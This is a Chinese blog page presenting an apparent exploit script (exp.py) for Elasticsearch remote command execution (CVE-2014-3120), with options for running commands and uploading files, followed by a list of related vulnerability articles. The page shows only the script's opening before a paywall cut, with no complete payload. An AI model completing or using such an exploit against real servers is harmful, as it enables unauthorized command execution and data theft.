elasticsearch 漏洞利用工具套装

最新推荐文章于 2024-06-20 22:58:22 发布
最新推荐文章于 2024-06-20 22:58:22 发布
阅读量3k 收藏 2
点赞数
分类专栏: LINUX/UNIX 黑红极白蓝 SHELL 汇编/硬件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freemindhack/article/details/37734737
版权

ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。支持通过HTTP使用JSON进行数据索引。

请勿用于非法用途,只供漏洞研究之用

因该脚本造成法律问题,作者概不负责,如果违反相关规定,请通知管理员删除该文章

exp:post提交 支持文件上传功能

exp.py

#!/usr/bin/env python
# by heshang ha.cker@me.com
# -*- coding: utf-8 -*-

import httplib
import urllib,urllib2
import simplejson
import string
import sys
from optparse import OptionParser

print 'Elasticsearch ExpLoit By Heshang'
print '                         2014-06-23'
options = OptionParser(usage='%prog ip [port] [command]', description='elasticsearch command exec exploit(CVE-2014-3120)')
options.add_option('-p', '--port', type='int', default='9200',help='The elasticsearch port (default:9200)')
options.add_option('-c', '--cmd', type='str', default='whoami', help='command to test (default:whoami)')
options.add_option('-P', '--path',type='str', default='', help='Upload file\'s path')

def post(ip,port,exp):
    ip=ip
    port=port
    path=''
    exp=exp
    data = {
     
    "size": 1,
    "query": {
     
        "filtered": {
     
            "query": 
最低0.47元/天 解锁文章
freemindhack
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透测试漏洞复现:Elasticsearch未授权漏洞复现
HACKONE的博客
03-18 2621
Elasticsearch 是一款 Java 编写的企业级搜索服务,它以分布式多用户能力和全文搜索引擎为特点,采用 RESTful web 接口。这款搜索引擎由 Java 开发,作为 Apache 许可下的开源软件发布,是流行的企业级搜索引擎之一。Elasticsearch 的增删改查操作都通过 http 接口完成。开源的版本可能存在未授权访问漏洞。这意味着攻击者可能获得 Elasticsearch 的所有权限,从而能够对数据进行任意操作。这可能导致业务系统中的敏感数据泄露、数据丢失、数据损坏。
[更新]Elasticsearch 代码执行漏洞利用检测工具
胡杨林
05-26 5336
1. ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。 2、Lucene是apache软件基金会4 jakarta项目组的一个子项目,是一个开放源代码的全文检索引擎工具
elasticsearch漏洞监测工具
09-17
elastiecsearch 的漏洞检测工具,对于elastiecsearch 在配置上或者版本上存在的问题有很好的检测和利用价值。
全网最强泛微漏洞综合利用工具
最新发布
Wulai399的博客
06-20 1304
26个poc集成,检测并利用,攻防神器
Elasticsearch未授权访问漏洞复现
HEAVEN569的博客
03-12 7253
简述 Elasticsearch是一个开源的高扩展的分布式全文搜索引擎,他可以近乎实时的存储、检索数据,本身扩展性很好,可以扩展到上百台服务器,处理PB级别的数据,Elasticsearch也使用Java开发并使用Lucene作为其核心来实现所有索引和搜索的功能,但是它的目的是通过简单的RESTful API来隐藏Lucene的复杂性,从而让全文搜索变得简单。 漏洞原理:Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 .
elasitcsearch漏洞在线检测工具
huaxiang_hu的专栏
05-21 1604
ZoomEye发布 ElasticSearch 远程代码执行漏洞(CVE-2014-3120) 全球分布:http://www.zoomeye.org/lab/es ElasticSearch 是一个广泛使用的数据库,在默认配置情况下,攻击者可以发送一个恶意请求让服务器执行 Java 代码,从而获取数据库敏感信息甚至发起更深入的攻击。在线漏洞检测:http://tool.scanv.com/es.
elasticsearch未授权漏洞判断与利用
qq_45366449的博客
04-15 6899
一、elasticsearch介绍 Elasticsearch 是一个分布式、高扩展、高实时的搜索与数据分析引擎。它能很方便的使大量数据具有搜索、分析和探索的能力。默认端口为9200。 二、elasticsearch未授权漏洞判断 1.存在未授权漏洞样式: 访问http://ip/9200;返回字段中有“you know,for search”则代表有未授权漏洞。 2.不存在未授权样式:有登录点 三、elasticsearch未授权漏洞利用 1.利用工具ElasticSearch Head 2.工具
Elasticsearch 代码执行漏洞利用工具
weixin_34408624的博客
11-03 993
命令参数忘记编码了,导致不能执行多参数已修复了。修改了超时为10秒、异常情况直接输出页面源码。1、ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。2、Lucene是apache软件基金会4 jakarta项目组的一个子项目,是一个开放源代码的全文检索引擎工具包这个漏...
漏洞——Elasticsearch未授权访问漏洞(原理扫描)
龍承leo
10-21 3221
Elasticsearch未授权访问漏洞 修复
Elasticsearch_1.2漏洞利用工具
05-15
Elasticsearch_1.2漏洞利用工具,可以执行命令,上传文件,浏览文件。
elasticsearch漏洞检测工具V1.0.zip
05-26
elasticsearch漏洞检测工具V1.0.zip
Elasticsearch漏洞检测.rar
11-22
Elasticsearch漏洞检测工具,包含Elasticsearch_1.2漏洞利用工具.jar和esExploit (elasticsearch)终极版.jar(Powered By VTI),如有侵权请联系删除。
使用Elastic Security检测最新的spring4shell漏洞
点火三周的专栏
04-08 1400
这个漏洞在清明假期刚出来的时候就想研究一下,一直拖延到现在。看来是已经赶不上热度了,但我觉得还是值得记录一下的。特别是Elastic刚刚在Forrester的“终端检测与响应Wave”报告中, 被评为“Strong Performer”(卓越表现者) 而对于这种层出不穷的零日漏洞,即便是购买了昂贵的网络安全设备都防不住,只能做事后诸葛。那不如考虑看看免费的开源解决方案,并且检测与响应已经成为了一种安全防御的共识:边界防御是一定会被渗透的,快速的检测与响应是必须的。 Spring4Shell 漏洞的工作原理
ElasticSearch漏洞复现
qq_63980959的博客
05-19 2573
Elasticsearch 是一个非常强大的搜索引擎。它目前被广泛地使用于各个 IT 公司。Elasticsearch 是由 Elastic 公司创建。它的代码位于 GitHub - elastic/elasticsearch: Free and Open, Distributed, RESTful Search Engine。Elasticsearch 是一个分布式、免费和开放的搜索和分析引擎,适用于所有类型的数据,包括文本、数字、地理空间、结构化和非结构化数据。
Elasticsearch未授权访问漏洞
weixin_30376083的博客
12-14 651
一. 漏洞简介 漏洞描述:ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java开发的,并作为Apache许可条款下的开放源码发布,是当前流行的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接口完。由于Elasticsearch授权模块需要付费,所以免...
Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246)
ahhacker86的专栏
01-23 1204
LFI通常出现在PHP应用中,通样是require这次应用在Nodejs程序中,相信未来还会有更多的Nodejs程序存在这种问题,原因是本地包含漏洞出现了很多年,但依旧有很多软件开发人员和架构师没有考虑到这点,这篇文章很好的说明了Kibana中存在的一个关键LFI漏洞,使得攻击者能够在服务器上运行本地代码,可造成直接的危害就是拒绝服务攻击,若在生产环境下业务实在伤不起,需要引起对Nodejs LFI的重视。
elasticsearch常用的漏洞利用方法
05-27
以下是一些常用的 Elasticsearch 漏洞利用方法: 1. 未授权访问漏洞:如果 Elasticsearch 未正确配置,攻击者可以轻易地访问和控制 Elasticsearch 服务器,从而获取敏感信息或造成破坏。 2. 注入漏洞:攻击者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值